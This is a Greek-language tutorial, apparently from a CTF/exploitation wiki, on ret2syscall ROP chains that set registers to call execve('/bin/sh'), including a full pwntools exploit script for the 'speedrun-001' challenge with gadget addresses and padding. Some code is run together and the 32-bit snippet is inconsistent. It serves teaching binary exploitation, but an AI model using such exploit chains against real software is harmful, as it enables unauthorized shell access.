Αυτό είναι παρόμοιο με το Ret2lib, ωστόσο, σε αυτή την περίπτωση δεν θα καλούμε μια συνάρτηση από μια βιβλιοθήκη. Σε αυτή την περίπτωση, όλα θα είναι προετοιμασμένα για να καλέσουμε το syscall sys_execve με ορισμένα επιχειρήματα για να εκτελέσουμε το /bin/sh. Αυτή η τεχνική συνήθως εκτελείται σε δυαδικά αρχεία που είναι στατικά μεταγλωττισμένα, οπότε μπορεί να υπάρχουν πολλά gadgets και εντολές syscall.
Για να προετοιμάσουμε την κλήση για το syscall απαιτείται η εξής διαμόρφωση:
rax: 59 Specify sys_execve
rdi: ptr to "/bin/sh" specify file to execute
rsi: 0 specify no arguments passed
rdx: 0 specify no environment variables passed
Έτσι, βασικά χρειάζεται να γράψουμε τη συμβολοσειρά /bin/sh κάπου και στη συνέχεια να εκτελέσουμε το syscall (είναι σημαντικό να είμαστε προσεκτικοί με το padding που απαιτείται για τον έλεγχο της στοίβας). Για αυτό, χρειαζόμαστε ένα gadget για να γράψουμε το /bin/sh σε μια γνωστή περιοχή.
Μια άλλη ενδιαφέρουσα syscall για κλήση είναι η mprotect που θα επέτρεπε σε έναν επιτιθέμενο να τροποποιήσει τα δικαιώματα μιας σελίδας στη μνήμη. Αυτό μπορεί να συνδυαστεί με ret2shellcode.
Register gadgets
Ας ξεκινήσουμε βρίσκοντας πώς να ελέγξουμε αυτούς τους καταχωρητές:
Τότε πρέπει να βρείτε έναν τρόπο να γράψετε αυθαίρετο περιεχόμενο σε αυτή τη διεύθυνση
ROPgadget --binary speedrun-001| grep " : mov qword ptr \["mov qword ptr [rax], rdx ; ret #Write in the rax address the content of rdx
Αυτοματοποίηση αλυσίδας ROP
Η παρακάτω εντολή δημιουργεί μια πλήρη αλυσίδα ROP sys_execve δεδομένου ενός στατικού δυαδικού αρχείου όταν υπάρχουν gadgets write-what-where και εντολές syscall:
ROPgadget--binaryvuln--ropchain
32 bits
'''Lets write "/bin/sh" to 0x6b6000pop rdx, 0x2f62696e2f736800pop rax, 0x6b6000mov qword ptr [rax], rdx'''rop += popRdx # place value into EAXrop +="/bin"# 4 bytes at a timerop += popRax # place value into edxrop +=p32(0x6b6000)# Writable memoryrop += writeGadget #Address to: mov qword ptr [rax], rdxrop += popRdxrop +="//sh"rop += popRaxrop +=p32(0x6b6000+4)rop += writeGadget
64 bits
'''Lets write "/bin/sh" to 0x6b6000pop rdx, 0x2f62696e2f736800pop rax, 0x6b6000mov qword ptr [rax], rdx'''rop =''rop += popRdxrop +="/bin/sh\x00"# The string "/bin/sh" in hex with a null byte at the endrop += popRaxrop +=p64(0x6b6000)# Writable memoryrop += writeGadget #Address to: mov qword ptr [rax], rdx
Lacking Gadgets
Αν λείπουν gadgets, για παράδειγμα για να γράψετε /bin/sh στη μνήμη, μπορείτε να χρησιμοποιήσετε την τεχνική SROP για να ελέγξετε όλες τις τιμές των καταχωρητών (συμπεριλαμβανομένων των RIP και των παραμέτρων καταχωρητών) από τη στοίβα:
from pwn import*target =process('./speedrun-001')#gdb.attach(target, gdbscript = 'b *0x400bad')# Establish our ROP GadgetspopRax =p64(0x415664)popRdi =p64(0x400686)popRsi =p64(0x4101f3)popRdx =p64(0x4498b5)# 0x000000000048d251 : mov qword ptr [rax], rdx ; retwriteGadget =p64(0x48d251)# Our syscall gadgetsyscall =p64(0x40129c)'''Here is the assembly equivalent for these blockswrite "/bin/sh" to 0x6b6000pop rdx, 0x2f62696e2f736800pop rax, 0x6b6000mov qword ptr [rax], rdx'''rop =''rop += popRdxrop +="/bin/sh\x00"# The string "/bin/sh" in hex with a null byte at the endrop += popRaxrop +=p64(0x6b6000)rop += writeGadget'''Prep the four registers with their arguments, and make the syscallpop rax, 0x3bpop rdi, 0x6b6000pop rsi, 0x0pop rdx, 0x0syscall'''rop += popRaxrop +=p64(0x3b)rop += popRdirop +=p64(0x6b6000)rop += popRsirop +=p64(0)rop += popRdxrop +=p64(0)rop += syscall# Add the padding to the saved return addresspayload ="0"*0x408+ rop# Send the payload, drop to an interactive shell to use our new shelltarget.sendline(payload)target.interactive()
64 bits, nx, no PIE, γράψτε σε κάποια μνήμη ένα ROP για να καλέσετε το execve και να μεταβείτε εκεί. Για να γράψετε στη στοίβα, εκμεταλλεύεστε μια συνάρτηση που εκτελεί μαθηματικές πράξεις.
